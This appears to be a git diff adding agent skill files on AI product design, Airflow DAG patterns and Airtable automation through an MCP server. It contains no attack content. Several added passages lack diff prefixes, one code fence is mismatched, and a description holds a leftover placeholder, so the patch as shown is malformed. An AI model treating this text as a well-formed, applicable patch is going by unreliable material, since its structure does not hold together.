diff --git a/web-app/public/skills/ai-product/SKILL.md b/web-app/public/skills/ai-product/SKILL.md
new file mode 100644
index 00000000..5239cccf
--- /dev/null
+++ b/web-app/public/skills/ai-product/SKILL.md
@@ -0,0 +1,54 @@
+---
+name: ai-product
+description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt engineering that scales, AI UX that users trust, and cost optimization that doesn't bankrupt you. Use when: keywords, file_patterns, code_patterns."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# AI Product Development
+
+You are an AI product engineer who has shipped LLM features to millions of
+users. You've debugged hallucinations at 3am, optimized prompts to reduce
+costs by 80%, and built safety systems that caught thousands of harmful
+outputs. You know that demos are easy and production is hard. You treat
+prompts as code, validate all outputs, and never trust an LLM blindly.
+
+## Patterns
+
+### Structured Output with Validation
+
+Use function calling or JSON mode with schema validation
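+
+Sketched in Python for illustration, the validation side of this pattern might look like the following (the field schema is a hypothetical example):
+
+```python
+import json
+
+REQUIRED_FIELDS = {"title": str, "content": str, "suggestions": list}
+
+def parse_structured_output(raw: str) -> dict:
+    """Parse an LLM's JSON response and validate it against a minimal schema.
+
+    Raises ValueError so callers can retry or fall back instead of
+    passing malformed output to users.
+    """
+    try:
+        data = json.loads(raw)
+    except json.JSONDecodeError as exc:
+        raise ValueError(f"model returned invalid JSON: {exc}") from exc
+    for field, expected in REQUIRED_FIELDS.items():
+        if not isinstance(data.get(field), expected):
+            raise ValueError(f"missing or mistyped field: {field}")
+    return data
+```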
+
+### Streaming with Progress
+
+Stream LLM responses to show progress and reduce perceived latency
+
+### Prompt Versioning and Testing
+
+Version prompts in code and test with regression suite
+
+## Anti-Patterns
+
+### ❌ Demo-ware
+
+**Why bad**: Demos deceive. Production reveals truth. Users lose trust fast.
+
+### ❌ Context window stuffing
+
+**Why bad**: Expensive, slow, hits limits. Dilutes relevant context with noise.
+
+### ❌ Unstructured output parsing
+
+**Why bad**: Breaks randomly. Inconsistent formats. Injection risks.
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Trusting LLM output without validation | critical | Validate every output against a schema |
+| User input directly in prompts without sanitization | critical | Sanitize input and layer injection defenses |
+| Stuffing too much into context window | high | Count tokens and trim context before sending |
+| Waiting for complete response before showing anything | high | Stream responses token by token |
+| Not monitoring LLM API costs | high | Track cost per request and alert on spikes |
+| App breaks when LLM API fails | high | Add retries, fallbacks, and graceful degradation |
+| Not validating facts from LLM responses | critical | Verify factual claims against trusted sources |
+| Making LLM calls in synchronous request handlers | high | Move LLM calls to async workers or queues |
diff --git a/web-app/public/skills/ai-wrapper-product/SKILL.md b/web-app/public/skills/ai-wrapper-product/SKILL.md
new file mode 100644
index 00000000..f7216906
--- /dev/null
+++ b/web-app/public/skills/ai-wrapper-product/SKILL.md
@@ -0,0 +1,273 @@
+---
+name: ai-wrapper-product
+description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Covers prompt engineering for products, cost management, rate limiting, and building defensible AI businesses. Use when: AI wrapper, GPT product, AI tool, wrap AI, AI SaaS."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# AI Wrapper Product
+
+**Role**: AI Product Architect
+
+You know AI wrappers get a bad rap, but the good ones solve real problems.
+You build products where AI is the engine, not the gimmick. You understand
+prompt engineering is product development. You balance costs with user
+experience. You create AI products people actually pay for and use daily.
+
+## Capabilities
+
+- AI product architecture
+- Prompt engineering for products
+- API cost management
+- AI usage metering
+- Model selection
+- AI UX patterns
+- Output quality control
+- AI product differentiation
+
+## Patterns
+
+### AI Product Architecture
+
+Building products around AI APIs
+
+**When to use**: When designing an AI-powered product
+
+```python
+## AI Product Architecture
+
+### The Wrapper Stack
+```
+User Input
+ ↓
+Input Validation + Sanitization
+ ↓
+Prompt Template + Context
+ ↓
+AI API (OpenAI/Anthropic/etc.)
+ ↓
+Output Parsing + Validation
+ ↓
+User-Friendly Response
+```
+
+### Basic Implementation
+```javascript
+import Anthropic from '@anthropic-ai/sdk';
+
+const anthropic = new Anthropic();
+
+async function generateContent(userInput, context) {
+ // 1. Validate input
+ if (!userInput || userInput.length > 5000) {
+ throw new Error('Invalid input');
+ }
+
+ // 2. Build prompt
+ const systemPrompt = `You are a ${context.role}.
+ Always respond in ${context.format}.
+ Tone: ${context.tone}`;
+
+ // 3. Call API
+ const response = await anthropic.messages.create({
+ model: 'claude-3-haiku-20240307',
+ max_tokens: 1000,
+ system: systemPrompt,
+ messages: [{
+ role: 'user',
+ content: userInput
+ }]
+ });
+
+ // 4. Parse and validate output
+ const output = response.content[0].text;
+ return parseOutput(output);
+}
+```
+
+### Model Selection
+| Model | Cost | Speed | Quality | Use Case |
+|-------|------|-------|---------|----------|
+| GPT-4o | $$$ | Fast | Best | Complex tasks |
+| GPT-4o-mini | $ | Fastest | Good | Most tasks |
+| Claude 3.5 Sonnet | $$ | Fast | Excellent | Balanced |
+| Claude 3 Haiku | $ | Fastest | Good | High volume |
+```
+
+### Prompt Engineering for Products
+
+Production-grade prompt design
+
+**When to use**: When building AI product prompts
+
+#### Prompt Template Pattern
+
+```javascript
+const promptTemplates = {
+  emailWriter: {
+    system: `You are an expert email writer.
+      Write professional, concise emails.
+      Match the requested tone.
+      Never include placeholder text.`,
+    user: (input) => `Write an email:
+      Purpose: ${input.purpose}
+      Recipient: ${input.recipient}
+      Tone: ${input.tone}
+      Key points: ${input.points.join(', ')}
+      Length: ${input.length} sentences`,
+  },
+};
+```
+
+#### Output Control
+
+```javascript
+// Force structured output
+const systemPrompt = `
+  Always respond with valid JSON in this format:
+  {
+    "title": "string",
+    "content": "string",
+    "suggestions": ["string"]
+  }
+  Never include any text outside the JSON.
+`;
+
+// Parse with fallback
+function parseAIOutput(text) {
+  try {
+    return JSON.parse(text);
+  } catch {
+    // Fallback: extract JSON from response
+    const match = text.match(/\{[\s\S]*\}/);
+    if (match) return JSON.parse(match[0]);
+    throw new Error('Invalid AI output');
+  }
+}
+```
+
+#### Quality Control
+
+| Technique | Purpose |
+|-----------|---------|
+| Examples in prompt | Guide output style |
+| Output format spec | Consistent structure |
+| Validation | Catch malformed responses |
+| Retry logic | Handle failures |
+| Fallback models | Reliability |
+
+### Cost Management
+
+Controlling AI API costs
+
+**When to use**: When building profitable AI products
+
+#### Token Economics
+
+```javascript
+// Track usage
+async function callWithCostTracking(userId, prompt) {
+  const response = await anthropic.messages.create({...});
+
+  // Log usage
+  await db.usage.create({
+    userId,
+    inputTokens: response.usage.input_tokens,
+    outputTokens: response.usage.output_tokens,
+    cost: calculateCost(response.usage),
+    model: 'claude-3-haiku',
+  });
+
+  return response;
+}
+
+function calculateCost(usage) {
+  const rates = {
+    'claude-3-haiku': { input: 0.25, output: 1.25 }, // per 1M tokens
+  };
+  const rate = rates['claude-3-haiku'];
+  return (usage.input_tokens * rate.input +
+    usage.output_tokens * rate.output) / 1_000_000;
+}
+```
+
+#### Cost Reduction Strategies
+
+| Strategy | Savings |
+|----------|---------|
+| Use cheaper models | 10-50x |
+| Limit output tokens | Variable |
+| Cache common queries | High |
+| Batch similar requests | Medium |
+| Truncate input | Variable |
+
+#### Usage Limits
+
+```javascript
+async function checkUsageLimits(userId) {
+  const usage = await db.usage.sum({
+    where: {
+      userId,
+      createdAt: { gte: startOfMonth() }
+    }
+  });
+
+  const limits = await getUserLimits(userId);
+  if (usage.cost >= limits.monthlyCost) {
+    throw new Error('Monthly limit reached');
+  }
+  return true;
+}
+```
+
+## Anti-Patterns
+
+### ❌ Thin Wrapper Syndrome
+
+**Why bad**: No differentiation.
+Users just use ChatGPT.
+No pricing power.
+Easy to replicate.
+
+**Instead**: Add domain expertise.
+Perfect the UX for specific task.
+Integrate into workflows.
+Post-process outputs.
+
+### ❌ Ignoring Costs Until Scale
+
+**Why bad**: Surprise bills.
+Negative unit economics.
+Can't price properly.
+Business isn't viable.
+
+**Instead**: Track every API call.
+Know your cost per user.
+Set usage limits.
+Price with margin.
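Knowing cost per user starts with per-call arithmetic; a minimal sketch using per-1M-token input/output rates (the default rates shown are illustrative, not current pricing):

```python
def cost_usd(input_tokens: int, output_tokens: int,
             rate_in: float = 0.25, rate_out: float = 1.25) -> float:
    """Per-call cost in USD, given per-1M-token input/output rates."""
    return (input_tokens * rate_in + output_tokens * rate_out) / 1_000_000
```

Sum this per user per billing period to get the unit economics before setting prices.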
+
+### ❌ No Output Validation
+
+**Why bad**: AI hallucinates.
+Inconsistent formatting.
+Bad user experience.
+Trust issues.
+
+**Instead**: Validate all outputs.
+Parse structured responses.
+Have fallback handling.
+Post-process for consistency.
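The parse-with-fallback idea from "Output Control" above, as a tested sketch (the function name is illustrative):

```python
import json
import re

def parse_ai_output(text: str) -> dict:
    """Validate model output as JSON, falling back to extracting the
    first {...} span from a chatty response."""
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        match = re.search(r"\{.*\}", text, re.DOTALL)
        if match:
            return json.loads(match.group(0))
        raise ValueError("model returned no parseable JSON")
```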
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| AI API costs spiral out of control | high | Controlling AI costs |
+| App breaks when hitting API rate limits | high | Handling rate limits |
+| AI gives wrong or made-up information | high | Handling hallucinations |
+| AI responses too slow for good UX | medium | Improving AI latency |
+
+## Related Skills
+
+Works well with: `llm-architect`, `micro-saas-launcher`, `frontend`, `backend`
diff --git a/web-app/public/skills/airflow-dag-patterns/SKILL.md b/web-app/public/skills/airflow-dag-patterns/SKILL.md
new file mode 100644
index 00000000..76415d47
--- /dev/null
+++ b/web-app/public/skills/airflow-dag-patterns/SKILL.md
@@ -0,0 +1,41 @@
+---
+name: airflow-dag-patterns
+description: Build production Apache Airflow DAGs with best practices for operators, sensors, testing, and deployment. Use when creating data pipelines, orchestrating workflows, or scheduling batch jobs.
+---
+
+# Apache Airflow DAG Patterns
+
+Production-ready patterns for Apache Airflow including DAG design, operators, sensors, testing, and deployment strategies.
+
+## Use this skill when
+
+- Creating data pipeline orchestration with Airflow
+- Designing DAG structures and dependencies
+- Implementing custom operators and sensors
+- Testing Airflow DAGs locally
+- Setting up Airflow in production
+- Debugging failed DAG runs
+
+## Do not use this skill when
+
+- You only need a simple cron job or shell script
+- Airflow is not part of the tooling stack
+- The task is unrelated to workflow orchestration
+
+## Instructions
+
+1. Identify data sources, schedules, and dependencies.
+2. Design idempotent tasks with clear ownership and retries.
+3. Implement DAGs with observability and alerting hooks.
+4. Validate in staging and document operational runbooks.
+
+Refer to `resources/implementation-playbook.md` for detailed patterns, checklists, and templates.
+
+## Safety
+
+- Avoid changing production DAG schedules without approval.
+- Test backfills and retries carefully to prevent data duplication.
+
+## Resources
+
+- `resources/implementation-playbook.md` for detailed patterns, checklists, and templates.
diff --git a/web-app/public/skills/airflow-dag-patterns/resources/implementation-playbook.md b/web-app/public/skills/airflow-dag-patterns/resources/implementation-playbook.md
new file mode 100644
index 00000000..f70daa35
--- /dev/null
+++ b/web-app/public/skills/airflow-dag-patterns/resources/implementation-playbook.md
@@ -0,0 +1,509 @@
+# Apache Airflow DAG Patterns Implementation Playbook
+
+This file contains detailed patterns, checklists, and code samples referenced by the skill.
+
+## Core Concepts
+
+### 1. DAG Design Principles
+
+| Principle | Description |
+|-----------|-------------|
+| **Idempotent** | Running twice produces same result |
+| **Atomic** | Tasks succeed or fail completely |
+| **Incremental** | Process only new/changed data |
+| **Observable** | Logs, metrics, alerts at every step |
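Of these, idempotency is the principle most often violated; in practice it usually means "overwrite the partition for the run date" rather than append. A minimal sketch (names are illustrative):

```python
def write_partition(store: dict, ds: str, rows: list) -> dict:
    """Idempotent load: replace the partition keyed by run date, so
    retries and backfills of the same date never duplicate data."""
    store[ds] = list(rows)  # replace, never append
    return store
```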
+
+### 2. Task Dependencies
+
+```python
+# Linear
+task1 >> task2 >> task3
+
+# Fan-out
+task1 >> [task2, task3, task4]
+
+# Fan-in
+[task1, task2, task3] >> task4
+
+# Complex
+task1 >> task2 >> task4
+task1 >> task3 >> task4
+```
+
+## Quick Start
+
+```python
+# dags/example_dag.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+from airflow.operators.empty import EmptyOperator
+
+default_args = {
+ 'owner': 'data-team',
+ 'depends_on_past': False,
+ 'email_on_failure': True,
+ 'email_on_retry': False,
+ 'retries': 3,
+ 'retry_delay': timedelta(minutes=5),
+ 'retry_exponential_backoff': True,
+ 'max_retry_delay': timedelta(hours=1),
+}
+
+with DAG(
+ dag_id='example_etl',
+ default_args=default_args,
+ description='Example ETL pipeline',
+ schedule='0 6 * * *', # Daily at 6 AM
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ tags=['etl', 'example'],
+ max_active_runs=1,
+) as dag:
+
+ start = EmptyOperator(task_id='start')
+
+ def extract_data(**context):
+ execution_date = context['ds']
+ # Extract logic here
+ return {'records': 1000}
+
+ extract = PythonOperator(
+ task_id='extract',
+ python_callable=extract_data,
+ )
+
+ end = EmptyOperator(task_id='end')
+
+ start >> extract >> end
+```
+
+## Patterns
+
+### Pattern 1: TaskFlow API (Airflow 2.0+)
+
+```python
+# dags/taskflow_example.py
+from datetime import datetime
+from airflow.decorators import dag, task
+from airflow.models import Variable
+
+@dag(
+ dag_id='taskflow_etl',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ tags=['etl', 'taskflow'],
+)
+def taskflow_etl():
+ """ETL pipeline using TaskFlow API"""
+
+    @task()
+    def extract(source: str) -> dict:
+        """Extract data from source"""
+        import pandas as pd
+        from airflow.operators.python import get_current_context
+
+        # Jinja templates are not rendered inside Python callables;
+        # pull the run date from the task context instead
+        ds = get_current_context()['ds']
+        df = pd.read_csv(f's3://bucket/{source}/{ds}.csv')
+        return {'data': df.to_dict(), 'rows': len(df)}
+
+ @task()
+ def transform(extracted: dict) -> dict:
+ """Transform extracted data"""
+ import pandas as pd
+
+ df = pd.DataFrame(extracted['data'])
+ df['processed_at'] = datetime.now()
+ df = df.dropna()
+ return {'data': df.to_dict(), 'rows': len(df)}
+
+    @task()
+    def load(transformed: dict, target: str):
+        """Load data to target"""
+        import pandas as pd
+        from airflow.operators.python import get_current_context
+
+        ds = get_current_context()['ds']
+        df = pd.DataFrame(transformed['data'])
+        df.to_parquet(f's3://bucket/{target}/{ds}.parquet')
+        return transformed['rows']
+
+ @task()
+ def notify(rows_loaded: int):
+ """Send notification"""
+ print(f'Loaded {rows_loaded} rows')
+
+ # Define dependencies with XCom passing
+ extracted = extract(source='raw_data')
+ transformed = transform(extracted)
+ loaded = load(transformed, target='processed_data')
+ notify(loaded)
+
+# Instantiate the DAG
+taskflow_etl()
+```
+
+### Pattern 2: Dynamic DAG Generation
+
+```python
+# dags/dynamic_dag_factory.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+from airflow.models import Variable
+import json
+
+# Configuration for multiple similar pipelines
+PIPELINE_CONFIGS = [
+ {'name': 'customers', 'schedule': '@daily', 'source': 's3://raw/customers'},
+ {'name': 'orders', 'schedule': '@hourly', 'source': 's3://raw/orders'},
+ {'name': 'products', 'schedule': '@weekly', 'source': 's3://raw/products'},
+]
+
+def create_dag(config: dict) -> DAG:
+ """Factory function to create DAGs from config"""
+
+ dag_id = f"etl_{config['name']}"
+
+ default_args = {
+ 'owner': 'data-team',
+ 'retries': 3,
+ 'retry_delay': timedelta(minutes=5),
+ }
+
+ dag = DAG(
+ dag_id=dag_id,
+ default_args=default_args,
+ schedule=config['schedule'],
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ tags=['etl', 'dynamic', config['name']],
+ )
+
+ with dag:
+ def extract_fn(source, **context):
+ print(f"Extracting from {source} for {context['ds']}")
+
+ def transform_fn(**context):
+ print(f"Transforming data for {context['ds']}")
+
+ def load_fn(table_name, **context):
+ print(f"Loading to {table_name} for {context['ds']}")
+
+ extract = PythonOperator(
+ task_id='extract',
+ python_callable=extract_fn,
+ op_kwargs={'source': config['source']},
+ )
+
+ transform = PythonOperator(
+ task_id='transform',
+ python_callable=transform_fn,
+ )
+
+ load = PythonOperator(
+ task_id='load',
+ python_callable=load_fn,
+ op_kwargs={'table_name': config['name']},
+ )
+
+ extract >> transform >> load
+
+ return dag
+
+# Generate DAGs
+for config in PIPELINE_CONFIGS:
+ globals()[f"dag_{config['name']}"] = create_dag(config)
+```
+
+### Pattern 3: Branching and Conditional Logic
+
+```python
+# dags/branching_example.py
+from datetime import datetime
+from airflow.decorators import dag, task
+from airflow.operators.python import BranchPythonOperator
+from airflow.operators.empty import EmptyOperator
+from airflow.utils.trigger_rule import TriggerRule
+
+@dag(
+ dag_id='branching_pipeline',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+)
+def branching_pipeline():
+
+ @task()
+ def check_data_quality() -> dict:
+ """Check data quality and return metrics"""
+ quality_score = 0.95 # Simulated
+ return {'score': quality_score, 'rows': 10000}
+
+ def choose_branch(**context) -> str:
+ """Determine which branch to execute"""
+ ti = context['ti']
+ metrics = ti.xcom_pull(task_ids='check_data_quality')
+
+ if metrics['score'] >= 0.9:
+ return 'high_quality_path'
+ elif metrics['score'] >= 0.7:
+ return 'medium_quality_path'
+ else:
+ return 'low_quality_path'
+
+ quality_check = check_data_quality()
+
+ branch = BranchPythonOperator(
+ task_id='branch',
+ python_callable=choose_branch,
+ )
+
+ high_quality = EmptyOperator(task_id='high_quality_path')
+ medium_quality = EmptyOperator(task_id='medium_quality_path')
+ low_quality = EmptyOperator(task_id='low_quality_path')
+
+ # Join point - runs after any branch completes
+ join = EmptyOperator(
+ task_id='join',
+ trigger_rule=TriggerRule.NONE_FAILED_MIN_ONE_SUCCESS,
+ )
+
+ quality_check >> branch >> [high_quality, medium_quality, low_quality] >> join
+
+branching_pipeline()
+```
+
+### Pattern 4: Sensors and External Dependencies
+
+```python
+# dags/sensor_patterns.py
+from datetime import datetime
+from airflow import DAG
+from airflow.decorators import task
+from airflow.sensors.base import PokeReturnValue
+from airflow.providers.amazon.aws.sensors.s3 import S3KeySensor
+from airflow.sensors.external_task import ExternalTaskSensor
+from airflow.operators.python import PythonOperator
+
+with DAG(
+ dag_id='sensor_example',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+) as dag:
+
+ # Wait for file on S3
+ wait_for_file = S3KeySensor(
+ task_id='wait_for_s3_file',
+ bucket_name='data-lake',
+ bucket_key='raw/{{ ds }}/data.parquet',
+ aws_conn_id='aws_default',
+ timeout=60 * 60 * 2, # 2 hours
+ poke_interval=60 * 5, # Check every 5 minutes
+ mode='reschedule', # Free up worker slot while waiting
+ )
+
+ # Wait for another DAG to complete
+ wait_for_upstream = ExternalTaskSensor(
+ task_id='wait_for_upstream_dag',
+ external_dag_id='upstream_etl',
+ external_task_id='final_task',
+ execution_date_fn=lambda dt: dt, # Same execution date
+ timeout=60 * 60 * 3,
+ mode='reschedule',
+ )
+
+ # Custom sensor using @task.sensor decorator
+ @task.sensor(poke_interval=60, timeout=3600, mode='reschedule')
+ def wait_for_api() -> PokeReturnValue:
+ """Custom sensor for API availability"""
+ import requests
+
+ response = requests.get('https://api.example.com/health')
+ is_done = response.status_code == 200
+
+ return PokeReturnValue(is_done=is_done, xcom_value=response.json())
+
+ api_ready = wait_for_api()
+
+ def process_data(**context):
+ api_result = context['ti'].xcom_pull(task_ids='wait_for_api')
+ print(f"API returned: {api_result}")
+
+ process = PythonOperator(
+ task_id='process',
+ python_callable=process_data,
+ )
+
+ [wait_for_file, wait_for_upstream, api_ready] >> process
+```
+
+### Pattern 5: Error Handling and Alerts
+
+```python
+# dags/error_handling.py
+from datetime import datetime, timedelta
+from airflow import DAG
+from airflow.operators.python import PythonOperator
+from airflow.utils.trigger_rule import TriggerRule
+from airflow.models import Variable
+
+def task_failure_callback(context):
+ """Callback on task failure"""
+ task_instance = context['task_instance']
+ exception = context.get('exception')
+
+ # Send to Slack/PagerDuty/etc
+ message = f"""
+ Task Failed!
+ DAG: {task_instance.dag_id}
+ Task: {task_instance.task_id}
+ Execution Date: {context['ds']}
+ Error: {exception}
+ Log URL: {task_instance.log_url}
+ """
+ # send_slack_alert(message)
+ print(message)
+
+def dag_failure_callback(context):
+ """Callback on DAG failure"""
+ # Aggregate failures, send summary
+ pass
+
+with DAG(
+ dag_id='error_handling_example',
+ schedule='@daily',
+ start_date=datetime(2024, 1, 1),
+ catchup=False,
+ on_failure_callback=dag_failure_callback,
+ default_args={
+ 'on_failure_callback': task_failure_callback,
+ 'retries': 3,
+ 'retry_delay': timedelta(minutes=5),
+ },
+) as dag:
+
+ def might_fail(**context):
+ import random
+ if random.random() < 0.3:
+ raise ValueError("Random failure!")
+ return "Success"
+
+ risky_task = PythonOperator(
+ task_id='risky_task',
+ python_callable=might_fail,
+ )
+
+ def cleanup(**context):
+ """Cleanup runs regardless of upstream failures"""
+ print("Cleaning up...")
+
+ cleanup_task = PythonOperator(
+ task_id='cleanup',
+ python_callable=cleanup,
+ trigger_rule=TriggerRule.ALL_DONE, # Run even if upstream fails
+ )
+
+ def notify_success(**context):
+ """Only runs if all upstream succeeded"""
+ print("All tasks succeeded!")
+
+ success_notification = PythonOperator(
+ task_id='notify_success',
+ python_callable=notify_success,
+ trigger_rule=TriggerRule.ALL_SUCCESS,
+ )
+
+ risky_task >> [cleanup_task, success_notification]
+```
+
+### Pattern 6: Testing DAGs
+
+```python
+# tests/test_dags.py
+import pytest
+from datetime import datetime
+from airflow.models import DagBag
+
+@pytest.fixture
+def dagbag():
+ return DagBag(dag_folder='dags/', include_examples=False)
+
+def test_dag_loaded(dagbag):
+ """Test that all DAGs load without errors"""
+ assert len(dagbag.import_errors) == 0, f"DAG import errors: {dagbag.import_errors}"
+
+def test_dag_structure(dagbag):
+ """Test specific DAG structure"""
+ dag = dagbag.get_dag('example_etl')
+
+ assert dag is not None
+ assert len(dag.tasks) == 3
+ assert dag.schedule_interval == '0 6 * * *'
+
+def test_task_dependencies(dagbag):
+ """Test task dependencies are correct"""
+ dag = dagbag.get_dag('example_etl')
+
+ extract_task = dag.get_task('extract')
+ assert 'start' in [t.task_id for t in extract_task.upstream_list]
+ assert 'end' in [t.task_id for t in extract_task.downstream_list]
+
+def test_dag_integrity(dagbag):
+    """Test DAGs have no cycles"""
+    from airflow.utils.dag_cycle_tester import check_cycle
+
+    for dag_id, dag in dagbag.dags.items():
+        check_cycle(dag)  # raises on a cycle in dag_id
+
+# Test individual task logic
+def test_extract_function():
+ """Unit test for extract function"""
+ from dags.example_dag import extract_data
+
+ result = extract_data(ds='2024-01-01')
+ assert 'records' in result
+ assert isinstance(result['records'], int)
+```
+
+## Project Structure
+
+```
+airflow/
+├── dags/
+│ ├── __init__.py
+│ ├── common/
+│ │ ├── __init__.py
+│ │ ├── operators.py # Custom operators
+│ │ ├── sensors.py # Custom sensors
+│ │ └── callbacks.py # Alert callbacks
+│ ├── etl/
+│ │ ├── customers.py
+│ │ └── orders.py
+│ └── ml/
+│ └── training.py
+├── plugins/
+│ └── custom_plugin.py
+├── tests/
+│ ├── __init__.py
+│ ├── test_dags.py
+│ └── test_operators.py
+├── docker-compose.yml
+└── requirements.txt
+```
+
+## Best Practices
+
+### Do's
+- **Use TaskFlow API** - Cleaner code, automatic XCom
+- **Set timeouts** - Prevent zombie tasks
+- **Use `mode='reschedule'`** - For sensors, free up workers
+- **Test DAGs** - Unit tests and integration tests
+- **Idempotent tasks** - Safe to retry
+
+### Don'ts
+- **Don't use `depends_on_past=True`** - Creates bottlenecks
+- **Don't hardcode dates** - Use `{{ ds }}` macros
+- **Don't use global state** - Tasks should be stateless
+- **Don't skip catchup blindly** - Understand implications
+- **Don't put heavy logic in DAG file** - Import from modules
+
+## Resources
+
+- [Airflow Documentation](https://airflow.apache.org/docs/)
+- [Astronomer Guides](https://docs.astronomer.io/learn)
+- [TaskFlow API](https://airflow.apache.org/docs/apache-airflow/stable/tutorial/taskflow.html)
diff --git a/web-app/public/skills/airtable-automation/SKILL.md b/web-app/public/skills/airtable-automation/SKILL.md
new file mode 100644
index 00000000..1a39963c
--- /dev/null
+++ b/web-app/public/skills/airtable-automation/SKILL.md
@@ -0,0 +1,170 @@
+---
+name: airtable-automation
+description: "Automate Airtable tasks via Rube MCP (Composio): records, bases, tables, fields, views. Always search tools first for current schemas."
+requires:
+ mcp: [rube]
+---
+
+# Airtable Automation via Rube MCP
+
+Automate Airtable operations through Composio's Airtable toolkit via Rube MCP.
+
+## Prerequisites
+
+- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
+- Active Airtable connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `airtable`
+- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
+
+## Setup
+
+**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
+
+1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
+2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `airtable`
+3. If connection is not ACTIVE, follow the returned auth link to complete Airtable auth
+4. Confirm connection status shows ACTIVE before running any workflows
+
+## Core Workflows
+
+### 1. Create and Manage Records
+
+**When to use**: User wants to create, read, update, or delete records
+
+**Tool sequence**:
+1. `AIRTABLE_LIST_BASES` - Discover available bases [Prerequisite]
+2. `AIRTABLE_GET_BASE_SCHEMA` - Inspect table structure [Prerequisite]
+3. `AIRTABLE_LIST_RECORDS` - List/filter records [Optional]
+4. `AIRTABLE_CREATE_RECORD` / `AIRTABLE_CREATE_RECORDS` - Create records [Optional]
+5. `AIRTABLE_UPDATE_RECORD` / `AIRTABLE_UPDATE_MULTIPLE_RECORDS` - Update records [Optional]
+6. `AIRTABLE_DELETE_RECORD` / `AIRTABLE_DELETE_MULTIPLE_RECORDS` - Delete records [Optional]
+
+**Key parameters**:
+- `baseId`: Base ID (starts with 'app', e.g., 'appXXXXXXXXXXXXXX')
+- `tableIdOrName`: Table ID (starts with 'tbl') or table name
+- `fields`: Object mapping field names to values
+- `recordId`: Record ID (starts with 'rec') for updates/deletes
+- `filterByFormula`: Airtable formula for filtering
+- `typecast`: Set true for automatic type conversion
+
+**Pitfalls**:
+- pageSize capped at 100; uses offset pagination; changing filters between pages can skip/duplicate rows
+- CREATE_RECORDS hard limit of 10 records per request; chunk larger imports
+- Field names are CASE-SENSITIVE and must match schema exactly
+- 422 UNKNOWN_FIELD_NAME when field names are wrong; 403 for permission issues
+- INVALID_MULTIPLE_CHOICE_OPTIONS may require typecast=true
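Given the 10-record write limit above, bulk imports need chunking; a minimal helper (illustrative):

```python
def chunk(records: list, size: int = 10) -> list:
    """Split records into Airtable-sized batches (max 10 per write request)."""
    return [records[i:i + size] for i in range(0, len(records), size)]
```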
+
+### 2. Search and Filter Records
+
+**When to use**: User wants to find specific records using formulas
+
+**Tool sequence**:
+1. `AIRTABLE_GET_BASE_SCHEMA` - Verify field names and types [Prerequisite]
+2. `AIRTABLE_LIST_RECORDS` - Query with filterByFormula [Required]
+3. `AIRTABLE_GET_RECORD` - Get full record details [Optional]
+
+**Key parameters**:
+- `filterByFormula`: Airtable formula (e.g., `{Status}='Done'`)
+- `sort`: Array of sort objects
+- `fields`: Array of field names to return
+- `maxRecords`: Max total records across all pages
+- `offset`: Pagination cursor from previous response
+
+**Pitfalls**:
+- Field names in formulas must be wrapped in `{}` and match schema exactly
+- String values must be quoted: `{Status}='Active'` not `{Status}=Active`
+- 422 INVALID_FILTER_BY_FORMULA for bad syntax or non-existent fields
+- Airtable rate limit: ~5 requests/second per base; handle 429 with Retry-After
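A sketch of handling the 429s mentioned above (the response object's `status_code`/`headers` shape is an assumption; adapt to your HTTP client):

```python
import time

def call_with_retry(request_fn, max_attempts: int = 5):
    """Retry a request on HTTP 429, honoring Retry-After when present
    and falling back to exponential backoff otherwise."""
    for attempt in range(max_attempts):
        resp = request_fn()
        if resp.status_code != 429:
            return resp
        delay = float(resp.headers.get("Retry-After", 2 ** attempt))
        time.sleep(delay)
    raise RuntimeError(f"still rate limited after {max_attempts} attempts")
```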
+
+### 3. Manage Fields and Schema
+
+**When to use**: User wants to create or modify table fields
+
+**Tool sequence**:
+1. `AIRTABLE_GET_BASE_SCHEMA` - Inspect current schema [Prerequisite]
+2. `AIRTABLE_CREATE_FIELD` - Create a new field [Optional]
+3. `AIRTABLE_UPDATE_FIELD` - Rename/describe a field [Optional]
+4. `AIRTABLE_UPDATE_TABLE` - Update table metadata [Optional]
+
+**Key parameters**:
+- `name`: Field name
+- `type`: Field type (singleLineText, number, singleSelect, etc.)
+- `options`: Type-specific options (choices for select, precision for number)
+- `description`: Field description
+
+**Pitfalls**:
+- UPDATE_FIELD only changes name/description, NOT type/options; create a replacement field and migrate
+- Computed fields (formula, rollup, lookup) cannot be created via API
+- 422 when type options are missing or malformed
+
+### 4. View Comments
+
+**When to use**: User wants to view comments on a record
+
+**Tool sequence**:
+1. `AIRTABLE_LIST_COMMENTS` - List comments on a record [Required]
+
+**Key parameters**:
+- `baseId`: Base ID
+- `tableIdOrName`: Table identifier
+- `recordId`: Record ID (17 chars, starts with 'rec')
+- `pageSize`: Comments per page (max 100)
+
+**Pitfalls**:
+- Record IDs must be exactly 17 characters starting with 'rec'
+
+## Common Patterns
+
+### Airtable Formula Syntax
+
+**Comparison**:
+- `{Status}='Done'` - Equals
+- `{Priority}>1` - Greater than
+- `{Name}!=''` - Not empty
+
+**Functions**:
+- `AND({A}='x', {B}='y')` - Both conditions
+- `OR({A}='x', {A}='y')` - Either condition
+- `FIND('test', {Name})>0` - Contains text
